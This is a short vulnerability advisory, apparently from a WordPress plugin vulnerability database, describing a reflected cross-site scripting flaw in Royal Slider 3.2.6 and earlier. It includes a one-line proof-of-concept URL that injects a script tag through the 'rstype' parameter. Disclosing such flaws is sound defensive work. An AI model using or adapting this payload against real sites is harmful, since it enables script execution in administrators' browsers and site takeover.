WordPress Plugin Vulnerabilities
Royal Slider <= 3.2.6 - Authenticated Cross-Site Scripting (XSS)
Description
The vulnerability exists due to insufficient sanitization of user-supplied data in the "rstype" HTTP GET parameter when creating or editing a slider.
A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable website.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=new_royalslider&action=edit&rstype="><script>alert(String.fromCharCode(88,83,83))</script>
Classification
Type
XSS
Miscellaneous
Submitter
Gerard Arall
Verified
No
Timeline
Publicly Published
2015-09-12 (about 8 years ago)
Added
2015-09-13 (about 8 years ago)
Last Updated
2020-09-22 (about 3 years ago)